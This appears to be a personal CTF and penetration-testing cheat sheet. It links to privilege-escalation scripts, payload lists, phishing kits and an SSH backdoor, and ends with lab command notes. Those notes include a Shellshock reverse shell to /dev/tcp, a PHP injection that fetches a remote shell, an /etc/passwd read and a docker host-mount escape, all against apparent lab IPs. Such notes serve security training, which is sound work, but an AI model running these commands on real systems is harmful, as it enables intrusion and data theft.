Hacking links
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS - (linpeas.sh)
- https://github.com/mzet-/linux-exploit-suggester - (linux exploit suggester)
- https://github.com/saghul/lxd-alpine-builder.git - (LXD Alpine Linux image builder)
- https://github.com/pentestmonkey/windows-privesc-check - (windows-privesc-check)
- https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123 - (Linux Privilege Escalation Check Script[as linpeas])
- https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs - (dirtycow)
- https://github.com/Anon-Exploiter/SUID3NUM - ([finds weak points]alternative to find command — find / -perm -u=s -type f 2>/dev/null)
- https://github.com/DominicBreuker/pspy - (search for cron jobs, crontab, weak points..[pspy64 — binary executable file])
- https://gtfobins.github.io - (shell, sudo, file read.. etc)
- https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/privilege-escalation/linux/linux-examples.rst - (privilege escalation cheat sheet)
- https://book.hacktricks.xyz/linux-unix/privilege-escalation - (Linux Privilege Escalation)
- https://pentestlab.blog/category/privilege-escalation/ - (find command)(privilege escalation)
- https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs (scheduled-cron-jobs)
- https://www.hackingarticles.in/lxd-privilege-escalation/ - (lxd-privilege-escalation)
- https://github.com/pentestmonkey/php-reverse-shell - (php reverse shell (pentest monkey))
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md - (ALL Reverse Shell Cheatsheet)
- https://www.revshells.com/ - (create reverse shells by giving ip and port)
- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - (pentestmonkey reverse shell cheat sheet)
- https://highon.coffee/blog/reverse-shell-cheat-sheet/ - (reverse shell cheat sheet)
- https://github.com/payloadbox/xss-payload-list - (xss-payload-list)
- https://github.com/s0wr0b1ndef/WebHacking101/blob/master/xss-reflected-steal-cookie.md - (xss-reflected-steal-cookie)
- https://owasp.org/www-community/xss-filter-evasion-cheatsheet - (xss-filter-evasion-cheatsheet)
- https://www.google.com/intl/sw/about/appsecurity/learning/xss/
- https://github.com/qazbnm456/awesome-web-security#xss---cross-site-scripting - (cross-site-scripting)
- https://github.com/s0md3v/AwesomeXSS - (cross-site-scripting)
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection/Intruder - (sql injection cheat sheet)
- https://github.com/payloadbox/sql-injection-payload-list - (sql injection cheat sheeet)
- https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet - (sqlmap cheat sheet)
- https://github.com/radareorg/radare2 - (reverse engineering)(assembly code)
- https://scoding.de/uploads/r2_cs.pdf - (reverse engineering cheat sheet)
- https://cplusperks.com/narnia/#level7 - (gdb, rardare2, usage)
- https://github.com/NationalSecurityAgency/ghidra - (ghidra source code, download ghidra from website)
- https://ghidra-sre.org/ - (ghidra)
- https://ghidra-sre.org/CheatSheet.html - (ghidra cheat sheet)
- https://github.com/Maijin/radare2-workshop-2015/tree/master/IOLI-crackme/bin-win32 - (radare2 applications for practice)
- https://radare.gitbooks.io/radare2book/content/analysis/code_analysis.html - (Radare2 code analysis)
- https://github.com/qazbnm456/awesome-security-trivia/blob/master/Tricky-ways-to-exploit-PHP-Local-File-Inclusion.md - (lfi-cheat-sheet)
- https://highon.coffee/blog/lfi-cheat-sheet/ - (lfi-cheat-sheet)(phpfilter)
- https://github.com/payloadbox/rfi-lfi-payload-list - (rfi-lfi-payload-list)
- https://book.hacktricks.xyz/pentesting-web/file-inclusion#lfi-2-rce - (lfi - local file inclusion)
- https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst - (buffer overflows programs and procedure)
- https://tcm-sec.com/buffer-overflows-made-easy/ - (buffer overflows writeup)
- https://tryhackme.com/room/bufferoverflowprep - [for practice]
- https://www.tzero86bits.tk/posts/overflow_prep/#task-1---oscpexe---overflow1
- https://www.trenchesofit.com/2020/09/12/oscp-buffer-overflow-write-up/
- https://cd6629.gitbook.io/oscp-notes/buffer-overflow-wlk/buffer-overflow-prep
Buffer Overflow Videos:
- https://github.com/carlospolop/PayloadsAllTheThings - (PayloadsAllTheThings)
- https://github.com/swisskyrepo/PayloadsAllTheThings -(All kind of payloads, like seclists)
- https://github.com/payloadbox - (all payloads, like lfi,command,xss..etc)
- https://github.com/GohEeEn/CTF-and-Computer-Security-Tools - (All tools with there links)
- https://gchq.github.io/CyberChef/
- https://crackstation.net/
- https://www.base64decode.org/
- https://morsecode.world/international/decoder/audio-decoder-adaptive.html - (morsecode decoder)
- https://www.boxentriq.com/code-breaking/cipher-identifier - (extract Ciphertext, with or without key)
- https://md5decrypt.net/en/#answer - (Md5 Encrypt & Decrypt)
- https://hashes.com/en/decrypt/hash - (Decrypt MD5, SHA1, MySQL, NTLM, SHA256, SHA512 hashes)
- https://codebeautify.org/ - (all convertors, like cyberchef)
- https://codebeautify.org/string-hex-converter - (string-hex-converter)
- http://forum.codecall.net/topic/48889-c-tutorial-xor-encryption/ - (XOR Encryption [decrypt the files])
- https://www.guballa.de/vigenere-solver - ( vigenere cipher brute force cracker and if cipher is in different language like german, ..etc)
- https://hashcat.net/wiki/doku.php?id=example_hashes - (all Generic hash types for hashcat)
- https://www.dcode.fr/
- https://github.com/s-h-3-l-l/katoolin3 - (katoolin3)
- https://github.com/swisskyrepo/Wordpresscan - (wordpress scan)
- https://github.com/guelfoweb/knock - (subdomain scan)
- https://github.com/aboul3la/Sublist3r - (subdomain, domain, port scanner)
- https://github.com/s0md3v/Striker - (scans, see github documentation)
- https://github.com/Tib3rius/AutoRecon - (AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services)
- https://github.com/Tib3rius/revshellgen - (generate reverse shell of all types)
- https://github.com/lxd-images/alpine-3-7-apache-php5-6 - (lxd images)
- https://github.com/RustScan/RustScan - (RustScan - same as nmap scan)
- https://github.com/ropnop/kerbrute/releases - (kerbrute)
- https://github.com/SecureAuthCorp/impacket.git - (or apt install impacket )
- https://github.com/calebstewart/pwncat - (pwncat, same as netcat [nc])
- https://github.com/guelfoweb/knock - (enumerate subdomains)
- https://github.com/ffuf/ffuf - (same as wfuzz, gobuster)
- https://github.com/guelfoweb/wpbrute - (Wordpress user enumeration and password bruteforce)
- https://github.com/BC-SECURITY/Empire/ - (Empire 3 is a post-exploitation framework)
- https://github.com/nahamsec/lazyrecon
- https://github.com/xmendez/wfuzz
- https://github.com/infosec-au/altdns
- https://www.tenable.com/products/nessus/nessus-essentials - (nessus download)
- https://ghidra-sre.org/ (ghidra)
- https://github.com/DarkSecDevelopers/HiddenEye-Legacy - (phishing link)
- https://github.com/trustedsec/social-engineer-toolkit - (social-engineer-toolkit)
- https://github.com/An0nUD4Y/blackeye - (phishing )
- https://zsecurity.org/hiddeneye-with-ngrok-all-in-one-phishing-solution/ - (phishing)
- https://owasp.org/
- https://www.exploit-db.com/
- https://www.exploit-db.com/google-hacking-database
- https://osintframework.com/ (enumerations)
- https://www.sevenlayers.com/index.php/125-exploiting-shellshock - (shellshock vulnerability)
- https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/ - (wildcard-for-privilege-escalation, tar..etc)
- https://github.com/saleemrashid/sudo-cve-2019-18634 - (cve-2019-18634)
- https://www.exploit-db.com/exploits/1518 - (MySQL 4.x/5.0 (Linux))
- https://www.exploit-db.com/exploits/37292 - (Linux Kernel 3.13.0 < 3.19)
- https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
- https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/
- https://www.hacksplaining.com/ - (learn basic hacking)
- https://www.vulnhub.com/
- https://pentesterlab.com/exercises
- https://portswigger.net/web-security
- https://www.pentesteracademy.com/topics
- https://blueteamlabs.online/home - blto(cyber blue)
- https://elearnsecurity.com/product/ejpt-certification/ - elearnsecurity
- https://my.ine.com/area/ff0cb823-5bec-4b3a-b096-415dcf6c0adb - ine.com
- https://academy.tcm-sec.com/ - tcm-sec
- https://tryhackme.com/ - tryhackme
- https://www.hackthebox.eu/ - hackthebox
- https://securityblue.team/ - cyber blue
- https://ctf.hacker101.com/ctf - hacker101 ctf
- https://medium.com/@sparshjazz/how-to-learn-hacking-my-path-692fccd42d56
- https://tcm-sec.com/so-you-want-to-be-a-hacker-2021-edition/ - (how to become a hacker)
- https://blog.tryhackme.com/going-from-zero-to-hero/ - (Guide to go from Zero to Hero)
- https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/ - (penetration-testing-tools-cheat-sheet and method)
- https://github.com/GohEeEn/CTF-and-Computer-Security-Tools - (All tools in one link)
- https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters (bug bounty resources)
- https://highon.coffee/
- https://book.hacktricks.xyz/
- https://linuxize.com/
- https://neverendingsecurity.wordpress.com/
- https://muirlandoracle.co.uk/ (hacking articles, all write ups)
- https://www.hackingarticles.in/ (hacking articles, all write ups)
- https://pwn.by/noraj/
- https://writeup.raw.pm/
- https://blog.raw.pm/
- https://apjone.uk/
- https://github.com/JohnHammond/ctf-katana - (tools required for CTF..)
- https://github.com/mzet-/ctf-writeups - (some writeups)
- https://muirlandoracle.co.uk/ - (write ups)
- https://www.hackingarticles.in/ - (hacking articles, usage)
- https://github.com/josh-a-miller/ctf - (Tryhackme and hackthebox writeups)
- https://github.com/sagishahar/lpeworkshop - (walkthrough pdf)
- https://github.com/mzfr/vulnhub-writeups - (vulnhub writeups)
- https://github.com/VulnHub/ctf-writeups - (VulnHub ctf writeups)
- https://github.com/GohEeEn/TryHackMe-Write-Up - (TryHackMe Write Up)
- https://github.com/testerting/hacker101-ctf/tree/master/micro-cms_v2/flag2 - (hacker101 ctf)
- https://blog.fruxlabs.com/hacker101-ctf-solutions/ - (hacker101 ctf)
- https://github.com/sebastiendamaye/TryHackMe - (tryhackme writeups)
- https://muirlandoracle.co.uk/ - (hacking articles, all write ups)
- https://www.hackingarticles.in/ - (hacking articles, all write ups)
- https://noxtal.com/writeups/2020/07/11/tryhackme-koth-lion/ - (writeup for tryhackme-koth-lion)
- https://hackingresources.com/category/ctf-writeups/vulnhub-writeups/ - (vulnhub-writeups)
- https://www.aldeid.com/wiki/Category:CTF - (aldeid all ctf tryhackme, hackthebox, vulnhub)
- https://gitlab.com/ctf-and-walkthrough-writeups/tryhackme
- https://github.com/noraj/tryhackme-writeups
- https://infosecwriteups.com/tagged/vulnhub
- https://github.com/Ignitetechnologies/Vulnhub-CTF-Writeups
- https://www.vulnhub.com/resources/
- https://zime64.gitlab.io/writeups/
- https://github.com/payloadbox/command-injection-payload-list - (command-injection-payload-list)
- https://github.com/internetwache/GitTools - (git extractor (eg: .git))
- https://github.com/icsharpcode/ILSpy - (to see source code of applications)
- https://github.com/NinjaJc01/ssh-backdoor - (ssh backdoor)
- https://github.com/qazbnm456/awesome-web-security - (some cheat sheets and other links)
- https://github.com/Tib3rius/Pentest-Cheatsheets - (Pentest-Cheatsheets)
- https://github.com/JohnHammond/poor-mans-pentest - (reverse shells in bash scripts)
- https://github.com/lxd-images/alpine-3-7-apache-php5-6 - (lxd images)
- https://github.com/carlospolop/hacktricks - (hacking tricks)
- https://github.com/carlospolop/pwntools-tutorial - (pwntools-tutorial [go through])
- https://github.com/payloadbox/xxe-injection-payload-list - (xxe-injection-payload-list, xml)
- https://github.com/carlospolop/hacktricks - (hacking trick/technique)
- https://wiki.skullsecurity.org/Passwords (list of all passwords)
- https://www.openvas.org/
- https://www.rapid7.com/products/nexpose/
- https://www.tenable.com/products/nessus
Stegnography:1) Steghide2) Exiftool3) Binwalk4) StegoSuite5) Zsteg6) Sonic visualizer7) StegoveritasDirectroy Scanner Tool's :1) Dirb2) GoBuster3) Wfuzz4) DirBuster
- https://github.com/whoisflynn/OSCP-Exam-Report-Template - (Exam Report Template)
- https://github.com/noraj/OSCP-Exam-Report-Template-Markdown - (OSCP-Exam-Report-Template-Markdown)
- https://www.notion.so/OSCP-Exam-Notes-EXAM_DATE-cb9d15436e4849339aaa35979d582735 - (OSCP Exam Notes)
- https://github.com/JohnHammond/oscp-notetaking - (oscp note taking)
- https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom - (How-to-use-msfvenom)
- https://www.aircrack-ng.org/doku.php?id=airmon-ng - (airmong-ng usage)
- https://dashboard.ngrok.com/get-started/setup - (ngrok download and setup)
- http://irtfweb.ifa.hawaii.edu/~lockhart/gpg/ - ( gpg cheatsheet)
[find, curl, sed, grep, scp, wfuzz, docker]
find / -user root -perm -4000 -print 2>/dev/nullfind / -user root -perm -u=s 2>/dev/nullfind / -user archangel 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -type f -newermt "2021-02-15 19:00:00" ! -newermt "2021-02-16 20:00:00" -ls 2>/dev/nullfind / -name flag.txt -type f 2>/dev/nullfind / -user root -perm -4000 -executable -type f 2>/dev/null
sed -n 148p /home/santa/naughty_list.txt (read only 148th line contents)sed (use to replace the string with other string or character)
grep thm{.*} -i *grep -r mission * .[^.]* 2>/dev/null
curl -A "<?php file_put_contents('shell.php', file_get_contents('http://10.8.94.78:8080/shell.php')); ?>" -s http://10.10.148.69 (send the file to other ip address or upload a file to the webiste using curl)scp gherkin@10.10.251.122:/home/gherkin/cmd_service.py . (get files from other system through ssh)docker -H 10.10.171.188:2375 run -v /:/mnt --rm -it frontend chroot /mnt sh (take shell from docker)git checkout a3d30a7d0510dc6565ff9316e3fb84434916dee8
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.10.155.108//cgi-bin/test.cgicurl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.8.94.78/4242 0>&1' http://10.10.195.105/cgi-bin/test.cgi
scp index.html alex@10.10.101.79:/home/alex (to put files into other machine)[replace * {in place of index.html} to upload all files in that folder]scp alex@10.10.101.79:/home/alex . (to download files from other machine)[. means to this floder]